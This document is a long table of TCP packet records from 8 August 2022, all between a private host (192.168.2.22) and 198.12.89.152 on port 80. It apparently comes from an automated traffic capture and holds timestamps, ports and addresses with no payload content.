Aug 8, 2022 17:26:51.727526903 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727543116 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727556944 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727572918 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727572918 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727587938 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727591991 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727612972 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727627993 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727710962 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727731943 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727751970 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727755070 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727767944 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727772951 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727785110 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727790117 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727799892 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727806091 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727816105 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727823019 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727832079 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727839947 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727847099 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727855921 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727873087 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727878094 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727890015 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727895021 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727909088 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727916956 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727924109 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727933884 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727946043 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727951050 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727962017 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.727967024 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.727983952 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.728002071 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.728749990 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836241007 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836426973 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836472988 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836493969 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836509943 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836524963 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836540937 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836555958 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836568117 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836569071 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836585045 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836590052 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836601019 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836608887 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836616993 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836627960 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836632967 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836646080 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836654902 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836659908 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836678982 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836683989 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836699963 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836700916 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836718082 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836720943 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836735010 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836740017 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836750984 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836757898 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836766005 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836774111 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836782932 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836791039 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836798906 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836810112 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836813927 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836818933 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836828947 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836839914 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836844921 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836860895 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836860895 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836870909 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836877108 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836893082 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836893082 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836910963 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836914062 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836934090 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836935997 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836952925 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836958885 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836971998 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.836977005 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836994886 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.836999893 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837009907 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837021112 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837028980 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837038040 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837044001 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837054968 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837064981 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837070942 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837088108 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837090015 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837104082 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837111950 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837119102 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837130070 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837135077 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837146044 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837150097 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837162971 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837167025 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837178946 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837181091 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837196112 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837197065 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837207079 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837213039 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837228060 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837228060 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837244034 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837249994 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837259054 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837265968 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837275028 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837282896 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837291002 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837302923 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837306023 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837313890 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837321997 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837332964 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837337971 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837348938 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837357998 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837366104 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837374926 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837383986 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837389946 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837400913 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837407112 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837415934 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837426901 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837434053 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837444067 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837455034 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837459087 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837464094 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837475061 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837482929 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837490082 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837497950 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837506056 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837517977 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837521076 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837528944 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837537050 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837549925 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837553024 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837559938 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837568045 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837582111 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837584019 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837599039 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837599993 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837619066 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837620020 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837639093 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837640047 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837655067 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837657928 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837673903 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837673903 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837690115 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837692976 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837706089 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837713003 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837722063 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837732077 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837738037 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837743044 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837753057 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.837765932 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837776899 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.837795019 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841007948 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841029882 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841044903 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841059923 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841075897 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841089964 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841105938 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841121912 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841136932 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841152906 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841167927 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841172934 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841185093 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841186047 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841188908 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841191053 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841192961 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841195107 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841202021 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841208935 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841217041 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841228008 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841233015 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841244936 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841248035 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841264009 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841265917 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841279984 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841283083 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841295958 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841300011 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841310978 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841316938 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841327906 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841335058 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841341972 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841351032 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841357946 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841371059 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841372967 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841387033 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841391087 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841402054 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841408968 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841418028 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841423988 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841434002 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841440916 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841449022 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841459036 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841464996 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841475964 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841480970 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841494083 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841495991 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841511011 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841511011 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841526031 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841526031 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841541052 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841555119 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841556072 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841562986 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841573000 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841583014 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841587067 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841602087 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841602087 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841618061 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841619968 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841633081 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841649055 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841651917 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841664076 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841669083 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841680050 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841690063 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841697931 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841706991 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841712952 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841722012 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841728926 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841742992 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841744900 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841759920 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841763020 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841774940 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841782093 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841790915 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841800928 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841805935 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841823101 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841825008 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841836929 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841841936 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841852903 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841859102 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841869116 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841877937 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841883898 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841893911 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841898918 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841906071 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841914892 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841928959 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841929913 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841947079 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841952085 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841963053 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841965914 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841978073 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.841983080 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.841994047 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842000008 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842009068 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842020035 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842025995 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842039108 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842041016 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842057943 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842061043 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842073917 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842077971 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842089891 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842097044 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842106104 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842113018 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842122078 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842128038 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842135906 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842144966 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842152119 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842161894 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842168093 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842178106 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842183113 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842197895 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842199087 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842214108 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842216015 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842230082 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842232943 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842248917 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842256069 CEST	49179	80	192.168.2.22	198.12.89.152
